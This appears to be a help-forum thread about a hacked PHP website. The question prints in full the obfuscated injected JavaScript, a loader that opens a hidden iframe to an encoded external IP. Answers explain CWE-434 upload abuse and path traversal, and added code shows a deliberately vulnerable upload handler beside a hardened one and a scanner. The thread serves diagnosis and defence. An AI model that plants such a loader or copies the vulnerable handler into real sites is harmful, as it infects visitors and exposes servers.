PHP script: malicious JavaScript code at the end
The problem:
On my webspace there are PHP files which all end with this:
<?php include 'footer.php'; ?>
Before this line, there is also HTML code in the files.
The output in the browser ends with this, of course:
</body>
</html>
But yesterday, there was some malicious code at the end, suddenly. The output of my index.php was:
</body>
</html><body><script>
var i={j:{i:{i:'~',l:'.',j:'^'},l:{i:'%',l:218915,j:1154%256},j:{i:1^0,l:55,j:'ijl'}},i:{i:{i:function(j){try{var l=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x69\x6e\x70\x75\x74');l['\x74\x79\x70\x65']='\x68\x69\x64\x64\x65\x6e';l['\x76\x61\x6c\x75\x65']=j;l['\x69\x64']='\x6a';document['\x62\x6f\x64\x79']['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](l);}catch(j){return false;}
return true;},l:function(){try{var l=document['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64']('\x6a');}catch(l){return false;}
return l.value;},j:function(){var l=i.i.i.i(i.l.i.i('.75.67.67.63.3a.2f.2f.39.32.2e.36.30.2e.31.37.37.2e.32.33.35.2f.76.61.71.72.6b.2e.63.75.63.3f.66.75.61.6e.7a.72.3d.6b.37.36.6b.30.39'));var j=(l)?i.i.i.l():false;return j;}},l:{i:function(){var l=i.i.i.j('trashtext');var j=(l)?l:'trashtext';return j||false;},l:function(){var l=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x6c');l['\x77\x69\x64\x74\x68']='0.1em';l['\x68\x65\x69\x67\x68\x74']='0.2em';l['\x73\x74\x79\x6c\x65']['\x62\x6f\x72\x64\x65\x72']='none';l['\x73\x74\x79\x6c\x65']['\x64\x69\x73\x70\x6c\x61\x79']='none';l['\x69\x6e\x6e\x65\x72\x48\x54\x4d\x4c']='\x6c';l['\x69\x64']='\x6c';document['\x62\x6f\x64\x79']['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](l);},j:function(){var l=i.i.j.j(i.i.l.l());l=document['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64']('\x6c');var j=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x69\x66\x72\x61\x6d\x65');j['\x68\x65\x69\x67\x68\x74']=j['\x77\x69\x64\x74\x68'];j['\x73\x72\x63']=i.i.j.i(i.i.l.i());try{l['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](j);}catch(j){}}},j:{i:function(l){return l['replace'](/[A-Za-z]/g,function(j){return String['\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65']((((j=j.charCodeAt(0))&223)-52)%26+(j&32)+65);});},l:function(l){return i.i.j.i(l)['\x74\x6f\x53\x74\x72\x69\x6e\x67']()||false;},j:function(l){try{l();}catch(l){}}}},l:{i:{i:function(l){l=l['replace'](/[.]/g,'%');return window['\x75\x6e\x65\x73\x63\x61\x70\x65'](l);},l:'50',j:'33'},l:{i:'62',l:'83',j:'95'},j:{i:'46',l:'71',j:'52'}}}
i.i.l.j();</script>
I opened the file on my webspace (downloaded via FTP) and I saw that someone had put this code right into the file!
How could this happen?
The only ways I can imagine:
- Somebody got my FTP password. But he wouldn't only have put it into one file. He could have done much more damage. So I can't imagine this is the case.
- I have a virus on my PC myself. I use Notepad++ for editing and FileZilla for uploading. Maybe these programs were contaminated as well and I uploaded the malicious code - without knowing.
- Someone used a security hole (XSS) to put that code into the page. But he couldn't have put it right into the file, could he?
Symptoms:
Users reported a blue panel popping up in Firefox. It asked them to install a plugin. Now some of them have Exploit.Java.CVE-2010-0886.a on their PC.
Is this due to the malicious code? What did the code do exactly?
Can you help me?
Please help me, I'm really desperate.
Maybe one additional question, if you know how I could have got it: How could I prevent something like this in the future?
Edit #1:
I've found a file called "x76x09.php" in the root directory of my webspace. It has a filesize of 44.281 bytes. I've downloaded it and tried to open it. But my antivirus software said it's a trojan (Trojan.Script.224490). I think this file has been executed and added the malicious code to the "index.php" in every directory. Does this help? How could the trojan come to my webspace? Is this a well-known virus?
Edit #2:
My hoster says he can now be sure that the file wasn't uploaded via FTP. So the infection didn't happen via FTP. According to my hoster, it must be insecure scripts.
Edit #3:
Security holes according to PHPSecInfo:
- allow_url_fopen = 1
- allow_url_include = 1
- expose_php = 1
- file_uploads = 1 (is this to blame for the malicious "x76x09.php" file?)
- group_id = 99
- user_id = 99
Edit #4:
I've analyzed the file which had been executed on my webserver. Here's the results.
So this virus seems to be known as:
- PHP/C99Shell.BF
- Backdoor/PHP.C99Shell
- BackDoor.Generic_c.CQA
- Trojan.Script.224490
- Exploit.PHP.635
- Backdoor.PHP.C99Shell.bf
- Trojan.Script.224490
Could some of them cause the malicious file on my webspace which added the malicious code?
Comments (10)
I don't think that the problem is that you are using a shared host because I have found six others (degmsb, Benvolio, joomla01, DJ-Alien, valerione1979, and Kars) whose websites had the same script added. Also, it is doubtful that any of your files would be writable by others because files that are uploaded over FTP are subject to the file creation mode bits mask.
My best guess is that someone is cracking websites using either known exploits or exploits against common weaknesses, and that this person is identifying likely targets with Google hacking. degmsb's Wordpress website and Benvolio's Burning Board Lite website were likely cracked via known exploits (possibly known exploits of plugins to these software bases such as TinyMCE), and your website, since you wrote it yourself, was likely cracked via an exploit against a common website weakness.
Given that you allow file uploads (one of your PHP scripts accepts & saves files that are uploaded by your users), I would consider CWE-434: Unrestricted Upload of File with Dangerous Type. A CWE-434 exploit works like this: suppose you allow users to upload avatar images or pictures. The script to which uploaded images are POSTed might save the file to /images using the same filename that the user supplied. Now imagine that someone uploads x76x09.gif.php (or x76x09.gif.asp, x76x09.gif.php4, etc.). Your script will dutifully save this upload to /images/x76x09.gif.php and all that the cracker needs to do to have the server run this script is browse to /images/x76x09.gif.php. Even if the file is named x76x09.php.gif, some web servers will execute the file.
Another possibility is that the filename of the upload that PHP receives, $_FILES['upload']['name'], which is the filename value in the Content-Disposition header that is sent, was constructed to something like ..\modules\x.gif. If your script saved the newly-uploaded file to str_replace('\\', '/', '/images/' . basename($_FILES['upload']['name'])), or /images/../modules/x.gif on a non-Windows host (http://codepad.org/t83dYZwa), and there was some way for the user to cause one of your PHP scripts to include or require any script in the modules directory (say index.php?module=x.gif&action=blah), then the cracker would be able to execute arbitrary PHP.
EDIT: It looks like x76x09.php is some sort of unrestricted directory browser and file uploader. If a user manages to get this uploaded to your server, then they can basically do anything that you can do with your FTP access. Delete it.
EDIT2: Look for copies of this PHP source (the part gzuncompress(base64_decode("HJ3H...geFb//eeff/79z/8A"));). Remove it from all of your PHP scripts.
EDIT3: Googling parts of the PHP script, I have found several webpages where this source is listed verbatim, and all of these pages have something to do with file uploading functionality for the respective websites. It therefore seems very likely that the hacker of your website used a CWE-434 exploit.
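As an added example (not code from the answer or from the questioner's site), here is the upload pattern the answer describes, trusting $_FILES['upload']['name'], next to a hardened handler; the form field name "upload", the storage directory and the size limit are assumptions.

```php
<?php
// Added example, not code from the thread. Assumed names: form field
// "upload", storage directory UPLOAD_DIR, 2 MiB size cap.

const UPLOAD_DIR = '/var/www/html/images';   // assumed; not writable by other tenants
const MAX_BYTES  = 2 * 1024 * 1024;          // assumed cap
// Content type sniffed from the bytes => the extension the server assigns.
const ALLOWED = ['image/png' => 'png', 'image/jpeg' => 'jpg', 'image/gif' => 'gif'];

// VULNERABLE (CWE-434, plus the traversal the answer shows): the client picks
// both name and extension. x76x09.gif.php lands in a web-reachable directory
// as PHP, and basename() does not strip "..\" on a non-Windows host, so the
// str_replace() turns the name into /images/../modules/x.gif.
function store_upload_trusting_name(array $file): string
{
    $target = str_replace('\\', '/', UPLOAD_DIR . '/' . basename($file['name']));
    move_uploaded_file($file['tmp_name'], $target);
    return $target;
}

// HARDENED: the client-supplied name and type are never used.
function store_upload(array $file): string
{
    if ($file['error'] !== UPLOAD_ERR_OK || $file['size'] > MAX_BYTES) {
        throw new RuntimeException('upload rejected');
    }
    // Sniff the MIME type from the file contents, not from $file['type'].
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!isset(ALLOWED[$mime])) {
        throw new RuntimeException('unsupported content type');
    }
    // Sanity check that the bytes parse as an image. A GIF/PHP polyglot can
    // still pass this, which is why the stored name below never carries a
    // script extension and script execution must be off for UPLOAD_DIR.
    if (@getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('not a valid image');
    }
    // Server-generated name: random, one extension tied to the sniffed type,
    // no user-controlled characters, so no traversal and no double extension.
    $name   = bin2hex(random_bytes(16)) . '.' . ALLOWED[$mime];
    $target = UPLOAD_DIR . DIRECTORY_SEPARATOR . $name;
    if (!move_uploaded_file($file['tmp_name'], $target)) {
        throw new RuntimeException('could not store file');
    }
    chmod($target, 0644); // readable, not executable, not group/world-writable
    return $name;
}

if (isset($_FILES['upload'])) {
    echo htmlspecialchars(store_upload($_FILES['upload']), ENT_QUOTES, 'UTF-8');
}
```

Independently of the handler, disable script execution for the upload directory at the web server (with Apache and mod_php, `php_admin_flag engine off` in a Directory block for it), since, as the answer notes, some servers will still execute a file named x76x09.php.gif.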
Looks like your server has been compromised. Also, are you on a shared host?
You can find out the security configuration of your server with:
PhpSecInfo
(source: phpsec.org)
Who are you hosted with? Some hosters have security leaks that can get exploited.
Are you using WordPress? There have also been a number of reported outbreaks. The best thing to do would be to Google it, looking for people with similar problems, which will also lead to the cause, which will lead to the solutions.
As others have suggested, the vulnerability is most likely in some script you are using, maybe something you've written yourself or a well-known application that has known vulnerabilities. This might be a vulnerability in an upload script, but I want to point out that it is also possible to "upload" files through SQL injection; see the following thread for more details.
We experienced a problem similar to this a while ago with one of our major web properties. What your web host said was correct: it was likely not due to FTP access, but to an insecure script that somehow allowed modification of arbitrary files. In our case, a vulnerability in an old phpMyAdmin allowed changes to some PHP scripts.
If you haven't done so already, you may want to make sure that the web server has only read privileges to all scripts and HTML files. It turns out that Apache could also write to scripts in our case. Simply
I would suggest changing any FTP or SSH passwords to be very secure. If you use a hosting provider you should also notify them of the breach. If you do not have logs to investigate the matter then they may. You should also Google the code that was added to your page to see if you can find anything else.
phsource is the closest.
If you're on a shared server, other people have access to the server itself. This is sort of the definition of a shared server. The problem is that if you have files with permissions of 777, they are world-user-group writable. Which means anyone with access to the box can write to them. See the problem?
All it takes is one person on that box to have a weak password, poorly configured script, or a horrible bit of code, and a mediocre script kiddie can cause all kinds of problems all over the box. Most of these attacks are purely automated. They get access, scan for attack-able files, and append as needed.
Most likely, you should change all of your files to 755 or 644 permissions. You'll sleep better at night.
And after you're done cleaning it up, make sure Google hasn't flagged you as a malicious site. It's not horrible to clean up, but it can decimate your traffic in the meantime.
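Both the EDIT2 advice in the first answer (look for the gzuncompress(base64_decode( source in every PHP file) and the 777-permissions point in this answer can be checked with one read-only pass over the web root. This is an added example, not code from either answer; the indicator strings are the ones quoted on this page, and the set of file extensions inspected is an assumption.

```php
<?php
// Added example, not code from the thread: read-only scan of a web root for
// the indicators quoted on this page, run as:  php scan.php /path/to/webroot
// It only reports; review and clean each hit by hand.
// Assumption: only files with the extensions listed below are inspected.

$root = $argv[1] ?? '.';

// Indicators taken from this page: the hex-escaped document['createElement']
// from the injected script, and the packed-source call named in the answer.
$indicators = [
    'injected-js' => 'document[\'\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74\']',
    'packed-php'  => 'gzuncompress(base64_decode(',
];
$extensions = ['php', 'php4', 'php5', 'phtml', 'inc', 'html', 'htm', 'js'];

$files = new RecursiveIteratorIterator(
    new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
);
$findings = 0;
foreach ($files as $f) {
    if (!$f->isFile()) {
        continue;
    }
    $path  = $f->getPathname();
    $perms = $f->getPerms() & 0777;
    // 777-style permissions let any user on a shared box rewrite the file.
    if ($perms & 0002) {
        printf("world-writable  %04o  %s\n", $perms, $path);
        $findings++;
    }
    if (!in_array(strtolower($f->getExtension()), $extensions, true)) {
        continue;
    }
    $data = file_get_contents($path);
    if ($data === false) {
        continue;
    }
    foreach ($indicators as $label => $needle) {
        $pos = strpos($data, $needle);
        if ($pos !== false) {
            // Report the line number so the hit can be located in an editor.
            $line = substr_count(substr($data, 0, $pos), "\n") + 1;
            printf("%-15s line %d  %s\n", $label, $line, $path);
            $findings++;
        }
    }
}
fwrite(STDERR, "$findings finding(s)\n");
exit($findings > 0 ? 1 : 0);
```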
If you wrote the vulnerable web application yourself then you've already got a head start on figuring out where most of the access points which could be exploited are. Unfortunately, that may not be good enough (writing and maintaining secure web applications is harder than most people think).
If you didn't write the application yourself, or if you're re-using large, complex, components that someone else wrote, or if you simply need help getting a handle on website security then there are commercial services that can crawl your site and try to figure out where they are vulnerable, e.g.:
These services cost money, obviously, but you can usually get a "free trial" to see if they would be helpful. Good luck!
If you have a static IP, you can forbid FTP access from any IP other than yours.
This happened to me a while back in different manners. A work account was compromised through phpBB via a code exploit. Somehow, they even added themselves into the mySQL db users table. That caused us to completely remove the program and discontinue use.
An old Joomla install was the vulnerability that allowed people to do exactly what you speak of to my personal site. I had forgotten it was even out there, but it was enough to open the door for them to install malicious code on several different sites. I took the site down, changed permissions, updated Joomla, and scrubbed files.
My current production server gets "sniffed" for phpMyAdmin more than 1000 times per hour during some peak hack attempts. The bad guys are working overtime!
Bottom line, be wary of open source code and if you do use it, update, update, update.